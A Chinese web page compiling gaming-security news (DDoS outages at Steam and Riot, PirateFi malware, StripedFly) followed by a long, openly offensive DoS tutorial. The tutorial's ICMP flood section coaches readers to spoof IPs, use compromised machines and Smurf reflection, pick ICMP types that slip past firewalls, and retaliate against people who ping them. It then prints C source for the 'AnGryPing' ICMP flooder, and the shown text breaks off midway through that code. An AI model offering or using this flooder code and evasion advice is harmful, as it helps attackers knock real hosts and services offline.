在2025年10月7日,全球多家主流游戏和服务平台遭遇了一次大规模的网络攻击,导致服务大规模中断。下面表格整理了此次事件的核心信息,方便你快速了解。 项目具体情况事件时间2025年10月7日事件性质大规模分布式拒绝服务(DDoS)攻击主要受影响平台Steam、Riot Games(《英雄联盟》、《VALORANT》等)、Epic Games Store疑似攻击源AISURU 僵尸网络攻击峰值29.69 Tbps核心攻击手法TCP Carpet Bomb(TCP地毯式轰炸)服务恢复情况多数服务在事发当日已逐步恢复 事件详情与影响 故障表现:根据第三方监测网站SteamDB的数据,Steam的商店、社区、Web API以及《Dota 2》、《Team Fortress 2》等游戏的服务器均出现故障。玩家普遍报告无法登录账户、启动游戏或存取物品库。Riot Games也关闭了《英雄联盟》和《VALORANT》的排位功能以应对问题。 影响范围:此次攻击的影响范围非常广泛,除上述核心平台外,监测显示EA、Call of Duty、Marvel Rivals、Hulu,甚至PlayStation Network、AWS与Cloudflare等部分服务也出现了短暂的连線異常。 攻击来源分析 攻击源头:根据知名网络情报来源vxdb的说法,这次大规模DDoS攻击疑似由名为 AISURU的僵尸网络发起。 攻击手法:攻击采用了名为"TCP Carpet Bomb"的手法。这种攻击方式会向目标服务器发送海量看似正常的TCP请求,其流量巨大且难以与正常流量区分,因此具有很高的破坏性和防御难度。 服务恢复情况 在攻击发生后,相关平台的服務開始逐步恢復。根据报道,截至美西时间10月7日上午,Steam平台已部分恢复访问,Riot的游戏服务也基本恢复。 不过,需要留意的是,在服务恢复过程中可能出现过反复中断的情况,并且有玩家报告云端存档同步等功能在一段时间内依然不稳定。 #### Steam中国区已封锁R18游戏 大陆区帐号将无法访问 DoNews互娱 10 月 2 日消息(记者 张岱) 此前,Steam商店针对成人内容上线了一个商店页面筛选功能,玩家可以利用这一功能所提供的四个选项,进行有条件的过滤掉那些成人游戏内容,这些种类选项包含了血腥暴力或成人色情。不过今天,有玩家发现Steam国区的成人筛选选项被修改,“仅限成人,强烈的色情内容”这一选项被删除。 该选项被删除后,Steam的国区帐号将无法访问商店中的R18 游戏以及DLC内容,进入相应界面就会出现与“锁区游戏”相似的界面。 这一措施应该是为了之前Steam批准了未经遮蔽的成人游戏这一行为所设置的,之前Steam直接批准了未经遮蔽的成人游戏《Negligee:Love Stories》上架Steam。该游戏不需要打任何补丁就能直接游玩到成人内容。 经过测试,像《Mirror》和《Huniepop》这类的游戏未被锁定,但像《Negligee:Love Stories》这样的游戏已无法从Steam国区中搜索到。   #### Steam平台被 DDoS攻击 导致黑神话在线人数下降至百万以下 8 月 24 日消息,今晚有大量网友在社交平台反馈 Steam 平台无法登录,相关话题#steam 崩了#也登上了微博热搜。 本周发布的《黑神话:悟空》Steam 平台峰值在线人数 8 月 22 日刚刚突破 240 万,过去 24 小时在线人数仍有 230 万左右,随着 Steam 平台的突然崩溃,该游戏的实时在线人数已经降到百万以下。 据完美世界竞技平台公告显示,本次 Steam 崩溃是由于受到了 DDoS 攻击导致的,玩家可以尝试重连游戏。 DDoS攻击,即分布式拒绝服务攻击(Distributed Denial of Service Attack),是一种网络攻击手段,其目的是通过发送大量恶意流量,使目标网站、Web应用程序、云服务或其他在线资源无法处理这些流量,从而导致合法用户无法正常访问这些服务。 游戏业务往往是DDoS攻击重灾区,几乎99%的游戏平台都遭遇过DDoS攻击,而攻击的目的一般是勒索钱财或者竞争对手所为,从黑神话的热度来看,勒索可能性不大,毕竟是单机游戏,更像是一场竞争对手的攻击手段,具体不得而知,因为DDoS往往隐秘性非常强,想要查出是谁攻击,可能不大。 #### Steam惊现恶意软件游戏《PirateFi》!深度调查揭露Vidar木马全球犯罪网络 Valve近日紧急下架Steam平台一款伪装成生存RPG的恶意程序《PirateFi》,安全专家发现其背后竟牵涉全球最猖獗的Vidar信息窃取器产业链。这款潜伏在游戏引擎中的数字毒药,如何突破平台审核?主机帮为您带来独家深度解析。 一、恶意程序伪装游戏攻破Steam防线 2月19日,Valve公司从其全球最大PC游戏平台Steam下架《PirateFi》,这款标榜"海盗生存冒险"的游戏实为精心设计的数字特洛伊木马。安全团队Secuinfra猎鹰实验室发现,该程序捆绑的Vidar恶意软件已形成完整犯罪生态链,可窃取: 浏览器保存的密码与历史记录 加密货币钱包密钥及2FA动态验证码 远程登录凭证(包括会话Cookie) 屏幕截图及敏感文档 技术警示:Vidar采用进程注入技术绕过杀毒软件检测,其窃取的Steam登录凭证可直接导致游戏资产被盗。 二、起底"游戏工坊"犯罪新模式 调查显示,黑客利用售价$399起的《Easy Survival RPG》游戏模板快速构建《PirateFi》。该模板提供完整多人游戏框架,使得恶意代码可深度嵌入正常游戏逻辑中。 "这标志着网络犯罪进入工业化阶段,"Secuinfra首席研究员Marius Genheimer向TechCrunch透露,"攻击者通过标准化开发工具,批量生产带毒游戏,我们追踪到至少3个类似样本正在测试中。" 三、Vidar:暗网市值千万美元的犯罪服务 这个自2018年活跃的恶意软件家族,近年已发展成暗网"恶意软件即服务"(MaaS)的头部产品: 2022年:入侵Booking.com酒店预订系统 2023年:发动全球性LockBit勒索攻击 2024年:被美国卫生部门列为"最具破坏性窃密工具" HC3报告指出,Vidar犯罪网络采用区块链技术进行C2服务器通信,其分赃系统可自动按比例分配赃款,形成完整黑产闭环。 四、幽灵开发商现形记 自称开发商的"Seaworth Interactive"被证实为空壳公司: 无官网及商业注册记录 唯一X账号已删除 Steam页面使用AI生成美术素材 用户评价区存在大量机器人账号 Valve发言人表示已启动二次人工审核机制,但拒绝透露该游戏如何通过原有的AI审查系统。 安全建议: 启用Steam手机令牌二次验证 定期检查授权登录设备 避免在游戏PC保存敏感信息 这场游戏与恶意软件的猫鼠游戏仍在继续,网络犯罪分子正将攻击矛头指向数字娱乐产业。 #### StripedFly 被曝光漏洞,感染至少百万台 Windows 和 Linux 设备 10 月 28 日消息,根据卡巴斯基近日公布的安全报告,在过去 5 年时间里,监测一个名为 StripedFly 的复杂跨平台恶意软件平台,期间感染了超过 100 万台 Windows 和 Linux 设备。 StripedFly 采用基于 TOR 的复杂流量隐藏机制,可以从可信平台处自动更新,并具备类似蠕虫的传播功能,并衍生创建了 EternalBlue SMBv1 漏洞。 卡巴斯基表示尚不清楚 StripedFly 是否用于创收或网络间谍活动,复杂程度表明这是一种 APT(高级持续威胁)恶意软件。 根据该恶意软件的编译器时间戳,已知最早的具有 EternalBlue 漏洞的 StripedFly 版本是在 2016 年 4 月。 StripedFly 恶意软件框架是在卡巴斯基发现该平台的 shellcode 注入到 WININIT.EXE 进程(一个处理各种子系统初始化的合法 Windows 操作系统进程)后首次被发现的。 卡巴斯基在报告中表示:“恶意软件有效负载包含多个模块,使攻击者能够充当 APT、加密货币矿工,甚至勒索软件组织。” #### SuperPWA:一个把wordpress变成APP的的插件 移动互联网时代我们的网站来自电脑端的流量越来越少,相信不少站长都想过给网站做过APP、小程序之类的移动入口引流,但如果把网站制作成APP、小程序之类的由于技术限制及权限等原因网站的很多功能是实现不了的,而且可能会大改。 而SuperPWA这个插件就厉害了,他可以很轻松的把你的wordpress博客转换成类似于APP一样的效果,而且不管是功能还是模板都不会有任何改变。主机吧自己就装了一个,效果非常好。 安装方法很简单,进入插件-安装插件-搜索:SuperPWA-直接安装启用就可以了。 这个插件是外国人开发的,所以都是英文,不过没关系,我们可以利用谷歌浏览器插件翻译中文,用谷歌浏览器登陆插件设置,右击选“翻译成中文”就可以实现了。 这样我们就可以知道怎么设置了。很多站长可能会疑惑设置完后怎么没有下载APP文件之类的呢?如何看效果呢? 一开始主机吧也不是很懂,不过后面用手机访问网页后终于知道怎么回事了。原来这个是有区别于普通的APP通过下载文件安装的,我们不需要安装APP程序,只要有用户通过手机浏览器访问你的页面的时候,就会提示是否收藏显示在手机桌面上,非常方便,下面我们来看下效果吧。 图片上的主机吧就是保存到手机桌面时显示的效果,图标自己可以在设置那修改 进入网页时启用显示的图标,自己可以修改,主机吧用的是默认的。 进入网站后效果,完全看不出是在浏览网页,跟APP一样   看了上面的效果是不是觉得很酷呢?赶紧下载个试试吧。 #### SYN攻击、ICMP攻击、UDP Flood攻击原理和防御方法 SYN Flood攻击 DoS(Denial of Service拒绝服务)和DDoS(Distributed Denial of Service分布式拒绝服务)攻击是大型网站和网络服务器的安全威胁之一。2000年2月,Yahoo、亚马逊、CNN被攻击等事例,曾被刻在重大安全事件的历史中。SYN Flood由于其攻击效果好,已经成为目前最流行的DoS和DDoS攻击手段。 SYN Flood利用TCP协议缺陷,发送了大量伪造的TCP连接请求,使得被攻击方资源耗尽,无法及时回应或处理正常的服务请求。一个正常的TCP连接需要三次握手,首先客户端发送一个包含SYN标志的数据包,其后服务器返回一个SYN/ACK的应答包,表示客户端的请求被接受,最后客户端再返回一个确认包ACK,这样才完成TCP连接。在服务器端发送应答包后,如果客户端不发出确认,服务器会等待到超时,期间这些半连接状态都保存在一个空间有限的缓存队列中;如果大量的SYN包发到服务器端后没有应答,就会使服务器端的TCP资源迅速耗尽,导致正常的连接不能进入,甚至会导致服务器的系统崩溃。 防火墙通常用于保护内部网络不受外部网络的非授权访问,它位于客户端和服务器之间,因此利用防火墙来阻止DoS攻击能有效地保护内部的服务器。针对SYN Flood,防火墙通常有三种防护方式:SYN网关、被动式SYN网关和SYN中继。 SYN网关 防火墙收到客户端的SYN包时,直接转发给服务器;防火墙收到服务器的SYN/ACK包后,一方面将SYN/ACK包转发给客户端,另一方面以客户端的名义给服务器回送一个ACK包,完成TCP的三次握手,让服务器端由半连接状态进入连接状态。当客户端真正的ACK包到达时,有数据则转发给服务器,否则丢弃该包。由于服务器能承受连接状态要比半连接状态高得多,所以这种方法能有效地减轻对服务器的攻击。 被动式SYN网关 设置防火墙的SYN请求超时参数,让它远小于服务器的超时期限。防火墙负责转发客户端发往服务器的SYN包,服务器发往客户端的SYN/ACK包、以及客户端发往服务器的ACK包。这样,如果客户端在防火墙计时器到期时还没发送ACK包,防火墙则往服务器发送RST包,以使服务器从队列中删去该半连接。由于防火墙的超时参数远小于服务器的超时期限,因此这样能有效防止SYN Flood攻击。 SYN中继 防火墙在收到客户端的SYN包后,并不向服务器转发而是记录该状态信息然后主动给客户端回送SYN/ACK包,如果收到客户端的ACK包,表明是正常访问,由防火墙向服务器发送SYN包并完成三次握手。这样由防火墙做为代理来实现客户端和服务器端的连接,可以完全过滤不可用连接发往服务器。 ICMP flood(ICMP洪水攻击) 一、什么是ICMP协议? ICMP全称Internet Control Message Protocol(网际控制信息协议)。提起ICMP,一些人可能会感到陌生,实际上,ICMP与我们息息相关。在网络体系结构的各层次中,都需要控制,而不同的层次有不同的分工和控制内容,IP层的控制功能是最复杂的,主要负责差错控制、拥塞控制等,任何控制都是建立在信息的基础之上的,在基于IP数据 报的网络体系中,网关必须自己处理数据报的传输工作,而IP协议自身没有内在机制来获取差错信息并处理。为了处理这些错误,TCP/IP设计了ICMP协 议,当某个网关发现传输错误时,立即向信源主机发送ICMP报文,报告出错信息,让信源主机采取相应处理措施,它是一种差错和控制报文协议,不仅用于传输 差错报文,还传输控制报文。 二、ICMP报文格式 ICMP报文包含在IP数据报中,属于IP的一个用户,IP头部就在ICMP报文的前面,所以一个ICMP报文包括IP头部、ICMP头部和ICMP报文(见图表,ICMP报文的结构和几种常见的ICMP报文格式),IP头部的Protocol值为1就说明这是一个ICMP报文,ICMP头部中的类型 (Type)域用于说明ICMP报文的作用及格式,此外还有一个代码(Code)域用于详细说明某种ICMP报文的类型,所有数据都在ICMP头部后面。 RFC定义了13种ICMP报文格式,具体如下: 类型代码   类型描述 0    响应应答(ECHO-REPLY) 3    不可到达 4    源抑制 5    重定向 8    响应请求(ECHO-REQUEST) 11    超时 12    参数失灵 13    时间戳请求 14    时间戳应答 15    信息请求(*已作废) 16    信息应答(*已作废) 17    地址掩码请求 18    地址掩码应答 其中代码为15、16的信息报文已经作废。 下面是几种常见的ICMP报文: 1.响应请求 我们日常使用最多的ping,就是响应请求(Type=8)和应答(Type=0),一台主机向一个节点发送一个Type=8的ICMP报文,如果途中没 有异常(例如被路由器丢弃、目标不回应ICMP或传输失败),则目标返回Type=0的ICMP报文,说明这台主机存在,更详细的tracert通过计算 ICMP报文通过的节点来确定主机与目标之间的网络距离。 2.目标不可到达、源抑制和超时报文 这三种报文的格式是一样的,目标不可到达报文(Type=3)在路由器或主机不能传递数据报时使用,例如我们要连接对方一个不存在的系统端口(端口号小于 1024)时,将返回Type=3、Code=3的ICMP报文,它要告诉我们:“嘿,别连接了,我不在家的!”,常见的不可到达类型还有网络不可到达 (Code=0)、主机不可到达(Code=1)、协议不可到达(Code=2)等。源抑制则充当一个控制流量的角色,它通知主机减少数据报流量,由于ICMP没有恢复传输的报文,所以只要停止该报文,主机就会逐渐恢复传输速率。最后,无连接方式网络的问题就是数据报会丢失,或者长时间在网络游荡而找不到目标,或者拥塞导致主机在规定时间内无法重组数据报分段,这时就要触发ICMP超时报文的产生。超时报文的代码域有两种取值:Code=0表示传输超 时,Code=1表示重组分段超时。 3.时间戳 时间戳请求报文(Type=13)和时间戳应答报文(Type=14)用于测试两台主机之间数据报来回一次的传输时间。传输时,主机填充原始时间戳,接收方收到请求后填充接收时间戳后以Type=14的报文格式返回,发送方计算这个时间差。一些系统不响应这种报文。 三、回到正题:这样的攻击有效吗? 在前面讲过了,ping使用的是ECHO应答,不知道大家注意过没有,ping的返回很慢,用NetXRAY抓包仅为1--5包/秒,这是为什么呢?事实 上,ICMP本身并不慢(由于ICMP是SOCK_RAW产生的原始报文,速度比SOCK_STREAM的SYN和SOCK_DGRAM的UDP要快几乎 10倍!),这样的速度是ping程序故意延迟的(为什么?M$可不想每个人都能用ping来干坏事),同样,我测试过一些号称“ping洪水”的程序, 发现它们的效率和ping.exe没什么两样,经过Dependency Walker查看程序调用的函数发现,他们用的是icmp.dll提供的IcmpSendEcho这个API,这个函数是计算ECHO时间的,速度当然 慢!而那两个“高手”号召的ping攻击实际上就是为了实现ICMP洪水攻击,但是他们用的方法……想想洪水的速度和山涧小溪的速度相差多少吧!就用ping.exe和IcmpSendEcho这种小溪慢慢流淌的速度能做什么?还不是让人家看笑话!这种攻击根本就是浪费自己的时间!(如今还经常有人问 ping -l 65500 -t的攻击威力如何……哎,悲哀啊悲哀……) 四、什么是ICMP洪水? 1.ICMP洪水的成因 ping.exe和IcmpSendEcho速度慢的另一个原因是它们必须等待目标主机返回REPLY信息,这个过程需要花费大量时间,而Flood—— 洪水,顾名思义,是速度极快的,当一个程序发送数据包的速度达到了每秒1000个以上,它的性质就成了洪水产生器,洪水数据是从洪水产生器里出来的,但这 样还不够,没有足够的带宽,再猛的洪水也只能像公路塞车那样慢慢移动,成了鸡肋。要做真正的洪水,就需要有一条足够宽的高速公路才可以。极慢的发送速度+56Kbps小猫等于什么?等于一个未关紧的水龙头,根本没用。 由于ping.exe无法提速,这就需要专门的工具来做洪水了。足够快的数据包速度+足够的带宽,这才是洪水。 2.实现ICMP洪水的前提 最大的前提是攻击者的速度!如果你要用56K拨号去攻击一个512KbpsADSL用户,后果和一只蚂蚁伸腿想绊倒大象的天方夜谭是一样的!其次是你的机器运行速度和数据吞吐量,由于涉及IP校验和的计算(先设置头校验和域的数值为0,然后对整个数据报头按每16位求异或,再把结果取反,就得到了校验和),如果数据处理能力不够,在这步就慢了一个级别,效果当然大打折扣。最后就是目标机器的带宽!如果对方比你大很多(例如你2M ADSL,别人用DDN或T1),那么任何Flood都是无病呻吟,挠痒都不够!(希望不要再问“小金,你的R-Series怎么不好用啊”、“我用小金 的AnGryPing攻击别人半天都没事!”、“独裁者的攻击怎么无效啊?”这样的问题了,天啊,我头都大了!) 还有许多人都忽略的问题:发送的速度与数据包大小成反比,而且太大的数据包会被路由器等设备过滤掉!找到一个合适的数据包大小,对提高Flood的效率有很大帮助! 3.洪水——两败俱伤的攻击方式 别以为洪水无所不能,实际上,你展开洪水攻击时,攻击程序在消耗对方带宽和资源时,也在消耗你的带宽和资源。这只是个看谁撑得住的攻击而已。实际上,有经验的攻击者都是用被控制的服务器(肉鸡)来代替自己的机器发动攻击的,不到万不得已或者你对自己的机器网速有自信,否则尽量少用自己的机器来拼搏! 五、不同方式的ICMP洪水 1.直接Flood 要做这个的首要条件是你的带宽够,然后就是要一个好用的ICMP Flooder,别用ping.exe那种探路用的垃圾,例如我以前发布的AnGryPing,发包速度达到6000---9000包/秒(512Kbps ADSL),默认是32bytes的ECHO报文洪水,用它即使不能flood别人下去,防火墙也叫得够惨的了。直接攻击会暴露自己IP(如果对方没有还击能力那还无所谓,固定IP用户不推荐使用这种Flood),直接Flood主要是为了顾及Win9x/Me不能伪造IP的缺陷,否则一般还是别用为妙。 简单示意图: ICMP 攻击者[IP=211.97.54.3]--------------------------------->受害者[截获攻击者IP=211.97.54.3]==>换IP回来反击,嘿嘿 2.伪造IP的Flood 如果你是Win2000/XP并且是Administrator权限,可以试试看FakePing,它能随意伪造一个IP来Flood,让对方摸不到头脑,属于比较隐蔽阴险的Flood。 简单示意图: 伪造IP=1.1.1.1的ICMP 攻击者[IP=211.97.54.3]--------------------------------->受害者[截获攻击者IP=1.1.1.1]==>倒死 3.反射 用采取这种方式的第一个工具的名称来命名的“Smurf”洪水攻击,把隐蔽性又提高了一个档次,这种攻击模式里,最终淹没目标的洪水不是由攻击者发出的,也不是伪造IP发出的,而是正常通讯的服务器发出的! 实现的原理也不算复杂,Smurf方式把源IP设置为受害者IP,然后向多台服务器发送ICMP报文(通常是ECHO请求),这些接收报文的服务器被报文欺骗,向受害者返回ECHO应答(Type=0),导致垃圾阻塞受害者的门口…… 从示意图可以看出,它比上面两种方法多了一级路径——受骗的主机(称为“反射源”),所以,一个反射源是否有效或者效率低下,都会对Flood效果造成影响! 简单示意图: 伪造受害者的ICMP                    应答 攻击者[IP=211.97.54.3]-------------------------->正常的主机--------------->受害者[截获攻击者IP=……网易?!]==>哭啊…… 以上是几种常见的Flood方式,在测试中,我发现一个有趣的现象:一些防火墙(如天网)只能拦截ECHO请求(Ping)的ICMP报文,对于其他 ICMP报文一概睁只眼闭只眼,不知道其他防火墙有没有这个情况。所以想神不知鬼不觉对付你的敌人时,请尽量避开直接ECHO Flood,换用Type=0的ECHO应答或Type=14的时间戳应答最好,其他类型的ICMP报文没有详细测试过,大家可以试试看Type=3、 4、11的特殊报文会不会有更大效果。 六、ICMP Flood能防吗? 先反问你一个问题:洪水迅猛的冲来时,你能否拿着一个脸盆来抵挡?(坐上脸盆做现代鲁宾逊倒是个不错的主意,没准能漂到MM身边呢) 软件的网络防火墙能对付一些漏洞、溢出、OOB、IGMP攻击,但是对于洪水类型的攻击,它们根本无能为力,我通常对此的解释是“倾倒垃圾”:“有蟑螂或老鼠在你家门前逗留,你可以把它们赶走,但如果有人把一车垃圾倾倒在你家门口呢?”前几天看到mikespook大哥对此有更体面的解释,转载过来——“香蕉皮原理:如果有人给你一个香蕉和一个香蕉皮你能区分,并把没有用的香蕉皮扔掉。(一般软件防火墙就是这么判断并丢弃数据包的。)但是如果有人在同一时 间内在你身上倒一车香蕉皮,你再能区分有用没用也没啥作用了~~因为你被香蕉皮淹没了~~~~(所以就算防火墙能区分是DoS的攻击数据包,也只能识别, 根本来不及丢弃~~死了,死了,死了~~)” 所以,洪水没法防!能做的只有提高自己的带宽和预防洪水的发生(虽然硬件防火墙和分流技术能做到,但那价格是太昂贵的,而且一般人也没必要这样做)。 如果你正在被攻击,最好的方法是抓取攻击者IP(除非对方用第一种,否则抓了没用——假的IP)后,立即下线换IP!(什么?你是固定IP?没辙了,打电话找警察叔叔吧) 七、被ICMP Flood攻击的特征 如何发现ICMP Flood? 当你出现以下症状时,就要注意是否正被洪水攻击: 1.传输状态里,代表远程数据接收的计算机图标一直亮着,而你没有浏览网页或下载 2.防火墙一直提示有人试图ping你 3.网络速度奇慢无比 4.严重时系统几乎失去响应,鼠标呈跳跃状行走 如果出现这些情况,先不要慌张,冷静观察防火墙报警的频率及IP来确认是否普通的Ping或是洪水,做出相应措施(其实大多数情况也只能换IP了)。 1.普通ping 这种“攻击”一般是对方扫描网络或用ping -t发起的,没多大杀伤力(这个时候,防火墙起的作用就是延迟攻击者的数据报发送间隔时间,请别关闭防火墙!否则后果是严重的!),通常表现如下: ============================================================== [13:09:20] 61.151.252.106 尝试用Ping 来探测本机, 该操作被拒绝。 [13:09:24]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:26]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:30]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 ============================================================= 这么慢的速度,很明显是由ping.exe或IcmpSendEcho发出的,如果对方一直不停的让你的防火墙吵闹,你可以给他个真正的ICMP Flood问候。 2.直接Flood 这是比较够劲的真正意义洪水了,防火墙的报警密度会提高一个数量级: ============================================================== [13:09:20] 61.151.252.106 尝试用Ping 来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:20]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 [13:09:21]61.151.252.106 尝试用Ping来探测本机, 该操作被拒绝。 ============================================================= 这时候你的防火墙实际上已经废了,换个IP吧。 3.伪造IP的Flood 比较厉害的ICMP Flood,使用的是伪造的IP而且一样大密度,下面是the0crat用56K拨号对我的一次攻击测试的部分数据(看看时间,真晕了,这可是56K小猫而已啊) ============================================================= [18:52:12] 1.1.1.1 尝试用Ping 来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:12] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 [18:52:13] 1.1.1.1 尝试用Ping来探测本机, 该操作被拒绝。 ============================================================= 无言………… 4、反射ICMP Flood 估计现在Smurf攻击还没有多少人会用(R-Series的RSS.EXE就是做这事的,RSA.EXE和RSC.EXE分别用作SYN反射和UDP反射),所以这种方法还没有大规模出现,但Smurf是存在的!而且这个攻击方法比前面几种更恐怖,因为攻击你的是大网站(或一些受苦受难的服务器)! 我正在被网易、万网和新浪网站攻击中(懒得修改天网策略,直接用其他工具抓的。实际攻击中,反射的IP会多几倍!) ======================================================================= [15:26:32] RECV:ICMP Packet from 202.108.37.36 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 202.108.36.206 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 210.192.103.30 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 202.108.37.36 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 210.192.103.30 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 202.108.36.206 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 202.108.37.36 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 210.192.103.30 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 210.192.103.30 (Type=0,Code=0,Len=52) [15:26:32] RECV:ICMP Packet from 202.108.36.206 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 210.192.103.30 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 202.108.36.206 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 202.108.37.36 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 202.108.37.36 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 202.108.36.206 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 210.192.103.30(Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 202.108.37.36 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 202.108.36.206 (Type=0,Code=0,Len=52) [15:26:33] RECV:ICMP Packet from 210.192.103.30 (Type=0,Code=0,Len=52) ======================================================================= 可以看出,攻击者使用的是32bytes的ECHO请求,所以服务器返回52-20=32bytes的REPLY报文,在这个情况下,天网是不会报警的。 还是那句话,报警也没用了。 八、自己编写ICMP Flooder 以上说的都是理论,如何才能自己写一个呢?相信很多人已经跃跃欲试了,下面就用VC6.0来写一个直接的ICMP Flooder(能在Win98/Me环境使用)……先等等——最重要的是原理。 1.程序原理 当然不能用IcmpSendEcho来做,我们必须自己从最原始的IP报文里做一个。构造一个SOCK_RAW报文后,填充ICMP数据和计算校验和(CheckSum),循环sendto发出去就完成了,so easy! 2.ICMP报文的声明 一个ICMP报文包括IP头部、ICMP头部和ICMP报文,用IPPROTO_ICMP创建这个类型的IP包,用以下结构填充: typedef struct _ihdr { BYTE i_type; //8位类型 BYTE i_code; //8位代码 USHORT i_cksum; //16位校验和 USHORT i_id; //识别号 USHORT i_seq; //报文序列号 ULONG timestamp; //时间戳 }ICMP_HEADER; 这样我们就声明了一个ICMP报文结构,就等后面的填充了。 3.校验和 计算方法:先设置头校验和域的数值为0,然后对整个数据报头按每16位求异或,再把结果取反,就得到了校验和。 函数: USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } 4.必须注意的问题 由于Win98/Me系统不支持IP-Spoof,所以无法用setsockopt设置IP_HDRINCL让用户自己填充IP头部,所以Win98 /Me不能实现IP伪造!如果有人做的号称能伪造IP的工具而且又支持Win98/Me,那一定是吹出来的,因为这是系统限制,程序没法解决的。而且自己填充IP头部后,CheckSum就不是由系统计算了,这时候你的CheckSum计算函数就变成瓶颈了,这就是伪造IP后的Flooder发送速度不够 系统计算CheckSum的Flooder快的原因了,除非优化过CheckSum函数。限于篇幅,采用IP-Spoof技术的FakePing和Smurf就不讨论了。 5.完整代码 做一个Console Application工程,输入下面的代码。如果优化得当,最终编译生成的EXE也就4096字节而已,呵呵,justdo it…… ================================================== /* agp.c AnGryPing -- ICMPFlooder by HBU·小金(LK007) Copyright(C) 2002 E-MAIL:lk007@163.com */ #include<stdio.h> #include <winsock2.h> #include <ws2tcpip.h> #pragma comment(lib, "ws2_32.lib") //头文件和库文件声明,如果不能编译,请在Link里加上ws2_32.lib #define false 0 #define true 1 #define SEQ0x28376839 // 定义ICMP首部 typedef struct _ihdr { BYTE i_type; //8位类型 BYTE i_code; //8位代码 USHORT i_cksum; //16位校验和 USHORT i_id; //识别号 USHORT i_seq; //报文序列号 ULONG timestamp; //时间戳 }ICMP_HEADER; //计算校验和的子函数 USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int main(int argc,char **argv) { int datasize,ErrorCode,flag; int TimeOut=2000, SendSEQ=0,PacketSize=32,type=8,code=0,counter=0; //默认数据声明 char SendBuf[65535]={0}; //缓冲 WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; ICMP_HEADER icmp_header; char DestIp[20]; //目标IP    if(argc<2) { printf("AngryPing by HBU-LK007\n"); printf("Usage:%s [Dest] <PacketSize><type> <code>\n",argv[0]); //允许用户自定义数据包大小、类型、代码,用以绕过一些防火墙或做一些特殊的报文Flood exit(0); } strcpy(DestIp,argv[1]); if (argc>2) 